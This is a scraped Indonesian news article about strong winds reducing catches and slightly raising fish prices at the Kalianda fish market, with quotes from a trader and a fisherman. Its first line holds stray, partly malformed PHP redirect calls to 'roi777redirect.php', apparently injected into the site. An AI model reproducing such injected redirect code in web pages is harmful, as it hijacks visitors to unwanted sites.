header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Angin kencang, harga Ikan Alami Kenaikan -
Angin kencang, harga Ikan Alami Kenaikan

TRANSLAMPUNG.COM, KALIANDA-Sejak terjadi angin kencang yang terjadi di wilayah pantai selatan dalam sepekan terakhir, membuat hasil tangkapan para nelayan menjadi berkurang. Hal Ini berdampak pada kenaikan harga ikan dipasar Ikan Higienis, Kalianda.

Menurut Yuli (40), salah satu pedagang ikan yang ada di pasar ikan Higienis Kalianda mengatakan sejak memasuki bulan Februari keberadaan ikan yang ada di pusat pelelangan ikan (PPI) Kalianda ini mulai mengalami penurunan hasil tangkapan dari para nelayan berkurang akibat datang angin kencang dan memasuki bulan purnama.

“Biasanya saya menjual ikan, dengan berbagai jenis ikan. Tetapi karena ikan nya sulit untuk di cari, terpaksa untuk saat ini saya menjual ikan seadanya saja,” ujarnya, saat ditemui di lokasi pasar, Kamis (9/2).

Sejak satu pekan terakhir, dikatakan dia, harga Ikan yang ada di beberapa pasar mengalami kenaikan tipis dibanding harga sebelumnya. Seperti harga ikan tongkol sebelumnya hanya seharga Rp25 ribu/kg naik menjadi Rp26ribu/kg. Kemudian ikan tengkurungan, sebelumnya Rp20 ribu/kg menjadi Rp23 ribu/kg.

“Kenaikan ini harga ikan, hanya sedikit mengalami kenaikan berkisar Rp.1000-3000/kg tergantung jenisnya,” kata dia.

Sementara itu, Abdul Rojak (46) salah satu nelayan yang ada di lokasi pelelangan mengaku untuk enggan melaut selagi kondisi angin masih belum normal. Selain itu, kondisi perahu motor milik nya tidak begitu besar sehingga takut jika terjadi hal yang tidak di inginkan menipa ditengah laut.

“Untuk menghindari kecelakaan laut, saya lebih memilih untuk memperbaiki alat tangkap (Jaring-red) sambil menunggu kondisi angin berangsur normal,” kata dia.(jhn)

News Reporter